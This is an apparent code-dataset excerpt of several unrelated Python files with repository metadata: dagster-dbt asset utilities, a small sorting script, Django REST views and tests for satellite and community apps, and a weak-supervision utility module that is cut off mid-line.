KeyError(f\"Could not find a dbt model with name: {model_name}\")\n\n return dagster_dbt_translator.get_asset_key(next(iter(matching_models)))\n\n\ndef get_asset_keys_by_output_name_for_source(\n dbt_assets: Sequence[AssetsDefinition], source_name: str\n) -> Mapping[str, AssetKey]:\n \"\"\"Returns the corresponding Dagster asset keys for all tables in a dbt source.\n\n This is a convenience method that makes it easy to define a multi-asset that generates\n all the tables for a given dbt source.\n\n Args:\n source_name (str): The name of the dbt source.\n\n Returns:\n Mapping[str, AssetKey]: A mapping of the table name to corresponding Dagster asset key\n for all tables in the given dbt source.\n\n Examples:\n .. code-block:: python\n\n from dagster import AssetOut, multi_asset\n from dagster_dbt import dbt_assets, get_asset_keys_by_output_name_for_source\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n @multi_asset(\n outs={\n name: AssetOut(key=asset_key)\n for name, asset_key in get_asset_keys_by_output_name_for_source(\n [all_dbt_assets], \"raw_data\"\n ).items()\n },\n )\n def upstream_python_asset():\n ...\n\n \"\"\"\n check.sequence_param(dbt_assets, \"dbt_assets\", of_type=AssetsDefinition)\n check.str_param(source_name, \"source_name\")\n\n manifest, dagster_dbt_translator = get_manifest_and_translator_from_dbt_assets(dbt_assets)\n\n matching_nodes = [\n value for value in manifest[\"sources\"].values() if value[\"source_name\"] == source_name\n ]\n\n if len(matching_nodes) == 0:\n raise KeyError(f\"Could not find a dbt source with name: {source_name}\")\n\n return {\n output_name_fn(value): dagster_dbt_translator.get_asset_key(value)\n for value in matching_nodes\n }\n\n\ndef get_asset_key_for_source(dbt_assets: Sequence[AssetsDefinition], source_name: str) -> AssetKey:\n \"\"\"Returns the corresponding Dagster asset key for a dbt source with a singular table.\n\n Args:\n source_name (str): The name of the dbt source.\n\n Raises:\n DagsterInvalidInvocationError: If the source has more than one table.\n\n Returns:\n AssetKey: The corresponding Dagster asset key.\n\n Examples:\n .. code-block:: python\n\n from dagster import asset\n from dagster_dbt import dbt_assets, get_asset_key_for_source\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n @asset(key=get_asset_key_for_source([all_dbt_assets], \"my_source\"))\n def upstream_python_asset():\n ...\n \"\"\"\n asset_keys_by_output_name = get_asset_keys_by_output_name_for_source(dbt_assets, source_name)\n\n if len(asset_keys_by_output_name) > 1:\n raise KeyError(\n f\"Source {source_name} has more than one table:\"\n f\" {asset_keys_by_output_name.values()}. Use\"\n \" `get_asset_keys_by_output_name_for_source` instead to get all tables for a\"\n \" source.\"\n )\n\n return next(iter(asset_keys_by_output_name.values()))\n\n\ndef build_dbt_asset_selection(\n dbt_assets: Sequence[AssetsDefinition],\n dbt_select: str = \"fqn:*\",\n dbt_exclude: Optional[str] = None,\n) -> AssetSelection:\n \"\"\"Build an asset selection for a dbt selection string.\n\n See https://docs.getdbt.com/reference/node-selection/syntax#how-does-selection-work for\n more information.\n\n Args:\n dbt_select (str): A dbt selection string to specify a set of dbt resources.\n dbt_exclude (Optional[str]): A dbt selection string to exclude a set of dbt resources.\n\n Returns:\n AssetSelection: An asset selection for the selected dbt nodes.\n\n Examples:\n .. code-block:: python\n\n from dagster_dbt import dbt_assets, build_dbt_asset_selection\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n # Select the dbt assets that have the tag \"foo\".\n foo_selection = build_dbt_asset_selection([dbt_assets], dbt_select=\"tag:foo\")\n\n # Select the dbt assets that have the tag \"foo\" and all Dagster assets downstream\n # of them (dbt-related or otherwise)\n foo_and_downstream_selection = foo_selection.downstream()\n\n \"\"\"\n manifest, dagster_dbt_translator = get_manifest_and_translator_from_dbt_assets(dbt_assets)\n from .dbt_manifest_asset_selection import DbtManifestAssetSelection\n\n return DbtManifestAssetSelection(\n manifest=manifest,\n dagster_dbt_translator=dagster_dbt_translator,\n select=dbt_select,\n exclude=dbt_exclude,\n )\n\n\ndef build_schedule_from_dbt_selection(\n dbt_assets: Sequence[AssetsDefinition],\n job_name: str,\n cron_schedule: str,\n dbt_select: str = \"fqn:*\",\n dbt_exclude: Optional[str] = None,\n tags: Optional[Mapping[str, str]] = None,\n config: Optional[RunConfig] = None,\n execution_timezone: Optional[str] = None,\n) -> ScheduleDefinition:\n \"\"\"Build a schedule to materialize a specified set of dbt resources from a dbt selection string.\n\n See https://docs.getdbt.com/reference/node-selection/syntax#how-does-selection-work for\n more information.\n\n Args:\n job_name (str): The name of the job to materialize the dbt resources.\n cron_schedule (str): The cron schedule to define the schedule.\n dbt_select (str): A dbt selection string to specify a set of dbt resources.\n dbt_exclude (Optional[str]): A dbt selection string to exclude a set of dbt resources.\n tags (Optional[Mapping[str, str]]): A dictionary of tags (string key-value pairs) to attach\n to the scheduled runs.\n config (Optional[RunConfig]): The config that parameterizes the execution of this schedule.\n execution_timezone (Optional[str]): Timezone in which the schedule should run.\n Supported strings for timezones are the ones provided by the\n `IANA time zone database ` - e.g. \"America/Los_Angeles\".\n\n Returns:\n ScheduleDefinition: A definition to materialize the selected dbt resources on a cron schedule.\n\n Examples:\n .. code-block:: python\n\n from dagster_dbt import dbt_assets, build_schedule_from_dbt_selection\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n daily_dbt_assets_schedule = build_schedule_from_dbt_selection(\n [all_dbt_assets],\n job_name=\"all_dbt_assets\",\n cron_schedule=\"0 0 * * *\",\n dbt_select=\"fqn:*\",\n )\n \"\"\"\n return ScheduleDefinition(\n cron_schedule=cron_schedule,\n job=define_asset_job(\n name=job_name,\n selection=build_dbt_asset_selection(\n dbt_assets,\n dbt_select=dbt_select,\n dbt_exclude=dbt_exclude,\n ),\n config=config,\n tags=tags,\n ),\n execution_timezone=execution_timezone,\n )\n\n\ndef get_manifest_and_translator_from_dbt_assets(\n dbt_assets: Sequence[AssetsDefinition],\n) -> Tuple[Mapping[str, Any], \"DagsterDbtTranslator\"]:\n check.invariant(len(dbt_assets) == 1, \"Exactly one dbt AssetsDefinition is required\")\n dbt_assets_def = dbt_assets[0]\n metadata_by_key = dbt_assets_def.metadata_by_key or {}\n first_asset_key = next(iter(dbt_assets_def.metadata_by_key.keys()))\n first_metadata = metadata_by_key.get(first_asset_key, {})\n manifest_wrapper: Optional[\"DbtManifestWrapper\"] = first_metadata.get(MANIFEST_METADATA_KEY)\n if manifest_wrapper is None:\n raise DagsterInvariantViolationError(\n f\"Expected to find dbt manifest metadata on asset {first_asset_key.to_user_string()},\"\n \" but did not. Did you pass in assets that weren't generated by\"\n \" load_assets_from_dbt_project, load_assets_from_dbt_manifest, or @dbt_assets?\"\n )\n\n dagster_dbt_translator = first_metadata.get(DAGSTER_DBT_TRANSLATOR_METADATA_KEY)\n if dagster_dbt_translator is None:\n raise DagsterInvariantViolationError(\n f\"Expected to find dbt translator metadata on asset {first_asset_key.to_user_string()},\"\n \" but did not. Did you pass in assets that weren't generated by\"\n \" load_assets_from_dbt_project, load_assets_from_dbt_manifest, or @dbt_assets?\"\n )\n\n return manifest_wrapper.manifest, dagster_dbt_translator\n\n\n###################\n# DEFAULT FUNCTIONS\n###################\n\n\ndef default_asset_key_fn(dbt_resource_props: Mapping[str, Any]) -> AssetKey:\n \"\"\"Get the asset key for a dbt node.\n\n By default, if the dbt node has a Dagster asset key configured in its metadata, then that is\n parsed and used.\n\n Otherwise:\n dbt sources: a dbt source's key is the union of its source name and its table name\n dbt models: a dbt model's key is the union of its model name and any schema configured on\n the model itself.\n \"\"\"\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n asset_key_config = dagster_metadata.get(\"asset_key\", [])\n if asset_key_config:\n return AssetKey(asset_key_config)\n\n if dbt_resource_props[\"resource_type\"] == \"source\":\n components = [dbt_resource_props[\"source_name\"], dbt_resource_props[\"name\"]]\n else:\n configured_schema = dbt_resource_props[\"config\"].get(\"schema\")\n if configured_schema is not None:\n components = [configured_schema, dbt_resource_props[\"name\"]]\n else:\n components = [dbt_resource_props[\"name\"]]\n\n return AssetKey(components)\n\n\ndef default_metadata_from_dbt_resource_props(\n dbt_resource_props: Mapping[str, Any]\n) -> Mapping[str, Any]:\n metadata: Dict[str, Any] = {}\n columns = dbt_resource_props.get(\"columns\", {})\n if len(columns) > 0:\n metadata[\"table_schema\"] = MetadataValue.table_schema(\n TableSchema(\n columns=[\n TableColumn(\n name=column_name,\n type=column_info.get(\"data_type\") or \"?\",\n description=column_info.get(\"description\"),\n )\n for column_name, column_info in columns.items()\n ]\n )\n )\n return metadata\n\n\ndef default_group_from_dbt_resource_props(dbt_resource_props: Mapping[str, Any]) -> Optional[str]:\n \"\"\"Get the group name for a dbt node.\n\n If a Dagster group is configured in the metadata for the node, use that.\n\n Otherwise, if a dbt group is configured for the node, use that.\n \"\"\"\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n\n dagster_group = dagster_metadata.get(\"group\")\n if dagster_group:\n return dagster_group\n\n dbt_group = dbt_resource_props.get(\"config\", {}).get(\"group\")\n if dbt_group:\n return dbt_group\n\n return None\n\n\ndef group_from_dbt_resource_props_fallback_to_directory(\n dbt_resource_props: Mapping[str, Any]\n) -> Optional[str]:\n \"\"\"Get the group name for a dbt node.\n\n Has the same behavior as the default_group_from_dbt_resource_props, except for that, if no group can be determined\n from config or metadata, falls back to using the subdirectory of the models directory that the\n source file is in.\n\n Args:\n dbt_resource_props (Mapping[str, Any]): A dictionary representing the dbt resource.\n\n Examples:\n .. code-block:: python\n\n from dagster_dbt import group_from_dbt_resource_props_fallback_to_directory\n\n dbt_assets = load_assets_from_dbt_manifest(\n manifest=manifest,\n node_info_to_group_fn=group_from_dbt_resource_props_fallback_to_directory,\n )\n \"\"\"\n group_name = default_group_from_dbt_resource_props(dbt_resource_props)\n if group_name is not None:\n return group_name\n\n fqn = dbt_resource_props.get(\"fqn\", [])\n # the first component is the package name, and the last component is the model name\n if len(fqn) < 3:\n return None\n return fqn[1]\n\n\ndef default_freshness_policy_fn(dbt_resource_props: Mapping[str, Any]) -> Optional[FreshnessPolicy]:\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n freshness_policy_config = dagster_metadata.get(\"freshness_policy\", {})\n\n freshness_policy = _legacy_freshness_policy_fn(freshness_policy_config)\n if freshness_policy:\n return freshness_policy\n\n legacy_freshness_policy_config = dbt_resource_props[\"config\"].get(\n \"dagster_freshness_policy\", {}\n )\n legacy_freshness_policy = _legacy_freshness_policy_fn(legacy_freshness_policy_config)\n\n if legacy_freshness_policy:\n deprecation_warning(\n \"dagster_freshness_policy\",\n \"0.21.0\",\n \"Instead, configure a Dagster freshness policy on a dbt model using\"\n \" +meta.dagster.freshness_policy.\",\n )\n\n return legacy_freshness_policy\n\n\ndef _legacy_freshness_policy_fn(\n freshness_policy_config: Mapping[str, Any]\n) -> Optional[FreshnessPolicy]:\n if freshness_policy_config:\n return FreshnessPolicy(\n maximum_lag_minutes=float(freshness_policy_config[\"maximum_lag_minutes\"]),\n cron_schedule=freshness_policy_config.get(\"cron_schedule\"),\n cron_schedule_timezone=freshness_policy_config.get(\"cron_schedule_timezone\"),\n )\n return None\n\n\ndef default_auto_materialize_policy_fn(\n dbt_resource_props: Mapping[str, Any]\n) -> Optional[AutoMaterializePolicy]:\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n auto_materialize_policy_config = dagster_metadata.get(\"auto_materialize_policy\", {})\n\n auto_materialize_policy = _auto_materialize_policy_fn(auto_materialize_policy_config)\n if auto_materialize_policy:\n return auto_materialize_policy\n\n legacy_auto_materialize_policy_config = dbt_resource_props[\"config\"].get(\n \"dagster_auto_materialize_policy\", {}\n )\n legacy_auto_materialize_policy = _auto_materialize_policy_fn(\n legacy_auto_materialize_policy_config\n )\n\n if legacy_auto_materialize_policy:\n deprecation_warning(\n \"dagster_auto_materialize_policy\",\n \"0.21.0\",\n \"Instead, configure a Dagster auto-materialize policy on a dbt model using\"\n \" +meta.dagster.auto_materialize_policy.\",\n )\n\n return legacy_auto_materialize_policy\n\n\ndef _auto_materialize_policy_fn(\n auto_materialize_policy_config: Mapping[str, Any]\n) -> Optional[AutoMaterializePolicy]:\n if auto_materialize_policy_config.get(\"type\") == \"eager\":\n return AutoMaterializePolicy.eager()\n elif auto_materialize_policy_config.get(\"type\") == \"lazy\":\n return AutoMaterializePolicy.lazy()\n return None\n\n\ndef default_description_fn(dbt_resource_props: Mapping[str, Any], display_raw_sql: bool = True):\n code_block = textwrap.indent(\n dbt_resource_props.get(\"raw_sql\") or dbt_resource_props.get(\"raw_code\", \"\"), \" \"\n )\n description_sections = [\n dbt_resource_props[\"description\"]\n or f\"dbt {dbt_resource_props['resource_type']} {dbt_resource_props['name']}\",\n ]\n if display_raw_sql:\n description_sections.append(f\"#### Raw SQL:\\n```\\n{code_block}\\n```\")\n return \"\\n\\n\".join(filter(None, description_sections))\n\n\ndef is_generic_test_on_attached_node_from_dbt_resource_props(\n unique_id: str, dbt_resource_props: Mapping[str, Any]\n) -> bool:\n attached_node_unique_id = dbt_resource_props.get(\"attached_node\")\n is_generic_test = bool(attached_node_unique_id)\n\n return is_generic_test and attached_node_unique_id == unique_id\n\n\ndef default_asset_check_fn(\n asset_key: AssetKey,\n unique_id: str,\n dagster_dbt_translator_settings: \"DagsterDbtTranslatorSettings\",\n dbt_resource_props: Mapping[str, Any],\n) -> Optional[AssetCheckSpec]:\n is_generic_test_on_attached_node = is_generic_test_on_attached_node_from_dbt_resource_props(\n unique_id, dbt_resource_props\n )\n\n if not all(\n [\n dagster_dbt_translator_settings.enable_asset_checks,\n is_generic_test_on_attached_node,\n ]\n ):\n return None\n\n return AssetCheckSpec(\n name=dbt_resource_props[\"name\"],\n asset=asset_key,\n description=dbt_resource_props[\"description\"],\n )\n\n\ndef default_code_version_fn(dbt_resource_props: Mapping[str, Any]) -> str:\n return hashlib.sha1(\n (dbt_resource_props.get(\"raw_sql\") or dbt_resource_props.get(\"raw_code\", \"\")).encode(\n \"utf-8\"\n )\n ).hexdigest()\n\n\n###################\n# DEPENDENCIES\n###################\n\n\ndef is_non_asset_node(dbt_resource_props: Mapping[str, Any]):\n # some nodes exist inside the dbt graph but are not assets\n resource_type = dbt_resource_props[\"resource_type\"]\n if resource_type == \"metric\":\n return True\n if (\n resource_type == \"model\"\n and dbt_resource_props.get(\"config\", {}).get(\"materialized\") == \"ephemeral\"\n ):\n return True\n return False\n\n\ndef get_deps(\n dbt_nodes: Mapping[str, Any],\n selected_unique_ids: AbstractSet[str],\n asset_resource_types: List[str],\n) -> Mapping[str, FrozenSet[str]]:\n def _valid_parent_node(dbt_resource_props):\n # sources are valid parents, but not assets\n return dbt_resource_props[\"resource_type\"] in asset_resource_types + [\"source\"]\n\n asset_deps: Dict[str, Set[str]] = {}\n for unique_id in selected_unique_ids:\n dbt_resource_props = dbt_nodes[unique_id]\n node_resource_type = dbt_resource_props[\"resource_type\"]\n\n # skip non-assets, such as metrics, tests, and ephemeral models\n if is_non_asset_node(dbt_resource_props) or node_resource_type not in asset_resource_types:\n continue\n\n asset_deps[unique_id] = set()\n for parent_unique_id in dbt_resource_props.get(\"depends_on\", {}).get(\"nodes\", []):\n parent_node_info = dbt_nodes[parent_unique_id]\n # for metrics or ephemeral dbt models, BFS to find valid parents\n if is_non_asset_node(parent_node_info):\n visited = set()\n replaced_parent_ids = set()\n # make a copy to avoid mutating the actual dictionary\n queue = list(parent_node_info.get(\"depends_on\", {}).get(\"nodes\", []))\n while queue:\n candidate_parent_id = queue.pop()\n if candidate_parent_id in visited:\n continue\n visited.add(candidate_parent_id)\n\n candidate_parent_info = dbt_nodes[candidate_parent_id]\n if is_non_asset_node(candidate_parent_info):\n queue.extend(candidate_parent_info.get(\"depends_on\", {}).get(\"nodes\", []))\n elif _valid_parent_node(candidate_parent_info):\n replaced_parent_ids.add(candidate_parent_id)\n\n asset_deps[unique_id] |= replaced_parent_ids\n # ignore nodes which are not assets / sources\n elif _valid_parent_node(parent_node_info):\n asset_deps[unique_id].add(parent_unique_id)\n\n frozen_asset_deps = {\n unique_id: frozenset(parent_ids) for unique_id, parent_ids in asset_deps.items()\n }\n\n return frozen_asset_deps\n\n\ndef get_asset_deps(\n dbt_nodes,\n deps,\n io_manager_key,\n manifest: Optional[Mapping[str, Any]],\n dagster_dbt_translator: \"DagsterDbtTranslator\",\n) -> Tuple[\n Dict[AssetKey, Set[AssetKey]],\n Dict[AssetKey, Tuple[str, In]],\n Dict[AssetKey, Tuple[str, Out]],\n Dict[AssetKey, str],\n Dict[AssetKey, FreshnessPolicy],\n Dict[AssetKey, AutoMaterializePolicy],\n Dict[str, AssetCheckSpec],\n Dict[str, List[str]],\n Dict[str, Dict[str, Any]],\n]:\n from .dagster_dbt_translator import DbtManifestWrapper, validate_translator\n\n dagster_dbt_translator = validate_translator(dagster_dbt_translator)\n\n asset_deps: Dict[AssetKey, Set[AssetKey]] = {}\n asset_ins: Dict[AssetKey, Tuple[str, In]] = {}\n asset_outs: Dict[AssetKey, Tuple[str, Out]] = {}\n\n # These dicts could be refactored as a single dict, mapping from output name to arbitrary\n # metadata that we need to store for reference.\n group_names_by_key: Dict[AssetKey, str] = {}\n freshness_policies_by_key: Dict[AssetKey, FreshnessPolicy] = {}\n auto_materialize_policies_by_key: Dict[AssetKey, AutoMaterializePolicy] = {}\n check_specs: List[AssetCheckSpec] = []\n fqns_by_output_name: Dict[str, List[str]] = {}\n metadata_by_output_name: Dict[str, Dict[str, Any]] = {}\n\n for unique_id, parent_unique_ids in deps.items():\n dbt_resource_props = dbt_nodes[unique_id]\n\n output_name = output_name_fn(dbt_resource_props)\n fqns_by_output_name[output_name] = dbt_resource_props[\"fqn\"]\n\n metadata_by_output_name[output_name] = {\n key: dbt_resource_props[key] for key in [\"unique_id\", \"resource_type\"]\n }\n\n asset_key = dagster_dbt_translator.get_asset_key(dbt_resource_props)\n\n asset_deps[asset_key] = set()\n\n metadata = merge_dicts(\n dagster_dbt_translator.get_metadata(dbt_resource_props),\n {\n MANIFEST_METADATA_KEY: DbtManifestWrapper(manifest=manifest) if manifest else None,\n DAGSTER_DBT_TRANSLATOR_METADATA_KEY: dagster_dbt_translator,\n },\n )\n asset_outs[asset_key] = (\n output_name,\n Out(\n io_manager_key=io_manager_key,\n description=dagster_dbt_translator.get_description(dbt_resource_props),\n metadata=metadata,\n is_required=False,\n dagster_type=Nothing,\n code_version=default_code_version_fn(dbt_resource_props),\n ),\n )\n\n group_name = dagster_dbt_translator.get_group_name(dbt_resource_props)\n if group_name is not None:\n group_names_by_key[asset_key] = group_name\n\n freshness_policy = dagster_dbt_translator.get_freshness_policy(dbt_resource_props)\n if freshness_policy is not None:\n freshness_policies_by_key[asset_key] = freshness_policy\n\n auto_materialize_policy = dagster_dbt_translator.get_auto_materialize_policy(\n dbt_resource_props\n )\n if auto_materialize_policy is not None:\n auto_materialize_policies_by_key[asset_key] = auto_materialize_policy\n\n test_unique_ids = []\n if manifest:\n test_unique_ids = [\n child_unique_id\n for child_unique_id in manifest[\"child_map\"][unique_id]\n if child_unique_id.startswith(\"test\")\n ]\n\n for test_unique_id in test_unique_ids:\n test_resource_props = manifest[\"nodes\"][test_unique_id]\n check_spec = default_asset_check_fn(\n asset_key, unique_id, dagster_dbt_translator.settings, test_resource_props\n )\n\n if check_spec:\n check_specs.append(check_spec)\n\n for parent_unique_id in parent_unique_ids:\n parent_node_info = dbt_nodes[parent_unique_id]\n parent_asset_key = dagster_dbt_translator.get_asset_key(parent_node_info)\n\n asset_deps[asset_key].add(parent_asset_key)\n\n # if this parent is not one of the selected nodes, it's an input\n if parent_unique_id not in deps:\n input_name = input_name_fn(parent_node_info)\n asset_ins[parent_asset_key] = (input_name, In(Nothing))\n\n check_specs_by_output_name = cast(\n Dict[str, AssetCheckSpec],\n _validate_and_assign_output_names_to_check_specs(check_specs, list(asset_outs.keys())),\n )\n\n return (\n asset_deps,\n asset_ins,\n asset_outs,\n group_names_by_key,\n freshness_policies_by_key,\n auto_materialize_policies_by_key,\n check_specs_by_output_name,\n fqns_by_output_name,\n metadata_by_output_name,\n )\n\n\ndef has_self_dependency(dbt_resource_props: Mapping[str, Any]) -> bool:\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n has_self_dependency = dagster_metadata.get(\"has_self_dependency\", False)\n\n return has_self_dependency\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/asset_utils.py","file_name":"asset_utils.py","file_ext":"py","file_size_in_byte":27044,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"22398705923","text":"import sys\ninput = sys.stdin.readline\n\nnums = input().rstrip()\nnums = [int(n) for n in nums]\n\nordered_nums = sorted(nums, reverse=True)\n\nfor n in ordered_nums: \n print(n, end = '')","repo_name":"parksangmyeong1/Algorithm","sub_path":"Python/문자열/[BOJ]소트인사이드.py","file_name":"[BOJ]소트인사이드.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1397332585","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom .models import Satellite, Task\nfrom earth_api import serializers\nfrom earth_api.distributor import start_distribution, get_online_satellites\n\n\nclass RegisterSatellite(APIView):\n \"\"\"port is Satellite's PK so if someone tries to save an already saved satellite nothing will happen.\n There's no need to safe check first. In a way, that makes the get/ method unnecessary. \n I'll keep it nontheless. For it could be handy to know if a satellite is store in the db or not.\n \"\"\"\n\n serializer_class = serializers.RegisterSatelliteSerializer\n\n def get(self, request, format=None):\n port_number = request.query_params.get('port', None)\n host = request.query_params.get('host', None)\n\n if not port_number:\n return Response({'port': 'Missing parameter'}, status=status.HTTP_400_BAD_REQUEST)\n if not host:\n return Response({'host': 'Missing parameter'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n Satellite.objects.get(host, port=port_number)\n message = 'Found'\n except Satellite.DoesNotExist:\n return Response({'error': 'Satellite does not exists'},\n status=status.HTTP_404_NOT_FOUND)\n return Response({'message': message})\n\n def post(self, request):\n data = request.data.copy()\n serializer = self.serializer_class(data=data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass TaskResults(APIView):\n \"\"\"Used to get the results of the assigned tasks from the satellites.\n Because in this exercise the process time is almost non existent, we can \n instead obtain this data from the response to the get method of the Tasks \n view in satellites_app.satellites_api.views.TasksView\n \"\"\"\n serializer_class = serializers.TaskResultsSerializer\n\n def post(self, request):\n\n serializers = self.serializer_class(data=request.data)\n \n if serializers.is_valid():\n name = serializers.validated_data.get('name')\n date_added = serializers.validated_data.get('date_added')\n assigned_to = serializers.validated_data.get('assigned_to')\n completed = serializers.validated_data.get('completed')\n try:\n Task(\n name=name,\n date_added=date_added,\n assigned_to=assigned_to,\n completed=completed\n ).save()\n except Exception as e:\n return Response({'message': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n return Response({'message': 'Task saved.'})\n else:\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass OnlineSatellites(APIView):\n def get(self, request, format=None):\n online_satellites = get_online_satellites()\n serializer = serializers.RegisterSatelliteSerializer(online_satellites, many=True)\n return Response(serializer.data)\n\n\nclass StartButton(APIView):\n\n serializer_class = serializers.StartButtonSerializer\n\n def get(self, request, format=None):\n return Response({'example': DEMO})\n\n def post(self, request):\n\n serializers = self.serializer_class(data=request.data)\n\n if serializers.is_valid():\n tasks = serializers.validated_data.get('tasks')\n result = start_distribution(tasks)\n return Response({'message': result}) \n else:\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST) \n\n\nDEMO = {\n \"tasks\": [{\n \"name\": \"fotos\",\n \"pay_off\": 10,\n \"resources\": [1, 5]\n },\n {\n \"name\": \"mantenimiento\",\n \"pay_off\": 1,\n \"resources\": [1, 2]\n },\n {\n \"name\": \"pruebas\",\n \"pay_off\": 1,\n \"resources\": [5, 6]\n },\n {\n \"name\": \"fsck\",\n \"pay_off\": 0.1,\n \"resources\": [1, 6]\n }]\n}\n","repo_name":"TomCastagnino/satellites","sub_path":"ground/earth_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"567330454","text":"from rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.utils.crypto import get_random_string\nfrom rest_framework.authtoken.models import Token\nfrom community.views import Community, CommunitySerializer\n\n# Create your tests here.\n\n\nclass TestCommunityView(APITestCase):\n\n def setUp(self) -> None:\n self.url = \"/community\"\n self.user = User.objects.create_superuser(username=\"discord\")\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION=f\"Token {self.token.key}\")\n self.community = Community.objects.create(\n platform=self.user, community_id=get_random_string(20))\n\n def test_get(self) -> None:\n response = self.client.get(\n f\"{self.url}?id={self.community.community_id}\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.json(), CommunitySerializer(self.community).data)\n\n def test_post(self) -> None:\n community_id = get_random_string(20)\n response = self.client.post(\n self.url, data={\"communityID\": community_id}, format=\"json\")\n community = Community.objects.get(\n platform=self.user, community_id=community_id)\n\n self.assertEqual(response.json().get(\"platform\"), self.user.id)\n self.assertEqual(community.platform.id, self.user.id)\n self.assertEqual(response.json().get(\"community_id\"), community_id)\n self.assertEqual(community.community_id, community_id)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_put(self) -> None:\n self.assertEqual(self.community.discord_log_channel, Community._meta.get_field(\n \"discord_log_channel\").get_default())\n self.assertEqual(self.community.discord_notify_target, Community._meta.get_field(\n \"discord_notify_target\").get_default())\n discord_log_channel = get_random_string(20)\n discord_notify_target = get_random_string(20)\n\n response = self.client.put(self.url, data={\n \"communityID\": self.community.community_id,\n \"discord_log_channel\": discord_log_channel,\n \"discord_notify_target\": discord_notify_target\n }, format=\"json\")\n\n self.community = Community.objects.get(\n community_id=self.community.community_id)\n\n self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)\n self.assertEqual(self.community.discord_log_channel,\n discord_log_channel)\n self.assertEqual(self.community.discord_notify_target,\n discord_notify_target)\n\n def test_delete(self) -> None:\n community_id = self.community.community_id\n response = self.client.delete(\n f\"{self.url}?id={self.community.community_id}\", format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(Community.DoesNotExist):\n Community.objects.get(platform=self.user,\n community_id=community_id)\n","repo_name":"dragonejt/sibyl","sub_path":"community/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75328590248","text":"import logging\nimport random\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import TensorDataset\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_labels_randomly(\n rule_matches_z: np.ndarray, rule_assignments_t: np.ndarray\n) -> np.ndarray:\n \"\"\" Calculates sample labels basing on z and t matrices. If several patterns matched, select one randomly \"\"\"\n\n if rule_matches_z.shape[1] != rule_assignments_t.shape[0]:\n raise ValueError(\"Dimensions mismatch!\")\n\n one_hot_labels = rule_matches_z.dot(rule_assignments_t)\n one_hot_labels[one_hot_labels > 0] = 1\n labels = [np.random.choice(np.where(r == 1)[0], 1)[0] for r in one_hot_labels]\n return np.stack(labels, axis=0)\n\n\ndef vocab_and_vectors(filename: str, special_tokens: list) -> (dict, dict, np.ndarray):\n \"\"\"special tokens have all-zero word vectors\"\"\"\n with open(filename, encoding=\"UTF-8\") as in_file:\n parts = in_file.readline().strip().split(\" \")\n num_vecs = int(parts[0]) + len(special_tokens) # + 1\n dim = int(parts[1])\n\n matrix = np.zeros((num_vecs, dim))\n word_to_id = dict()\n\n nextword_id = 0\n for token in special_tokens:\n word_to_id[token] = nextword_id\n nextword_id += 1\n\n for line in in_file:\n parts = line.strip().split(\" \")\n word = parts[0]\n if word not in word_to_id:\n emb = [float(v) for v in parts[1:]]\n matrix[nextword_id] = emb\n word_to_id[word] = nextword_id\n nextword_id += 1\n return word_to_id, matrix\n\n\ndef get_embedding_matrix(pretrained_embedding_file: str) -> np.ndarray:\n \"\"\" Return matrix with pretrained glove embeddings\"\"\"\n with open(pretrained_embedding_file, encoding=\"UTF-8\") as in_file:\n emb_matrix_size = in_file.readline().strip().split(\" \")\n embeddings = []\n for line in in_file:\n parts = line.strip().split(\" \")\n embeddings.append([float(v) for v in parts[1:]])\n emb_matrix = np.array(embeddings)\n assert emb_matrix.shape[0] == int(emb_matrix_size[0]) and emb_matrix.shape[\n 1\n ] == int(emb_matrix_size[1])\n return emb_matrix\n\n\ndef set_device(enable_cuda: bool):\n \"\"\" Set where the calculations will be done (cpu or cuda) depending on whether the cuda is available and chosen \"\"\"\n if enable_cuda and torch.cuda.is_available():\n logger.info(\"Using GPU\")\n return torch.device(\"cuda\")\n else:\n logger.info(\"Using CPU\")\n return torch.device(\"cpu\")\n\n\n# deprecated\ndef check_splitting(\n tst_samples: TensorDataset,\n tst_labels: np.ndarray,\n tst_idx: np.ndarray,\n samples: torch.Tensor,\n labels: np.ndarray,\n) -> None:\n \"\"\" Custom function to check that the splitting into train and test sets fro WSCrossWeigh was done correctly\"\"\"\n\n rnd_tst = np.random.randint(0, tst_samples.tensors[0].shape[0]) # take some random index\n tst_sample = tst_samples.tensors[0][rnd_tst, 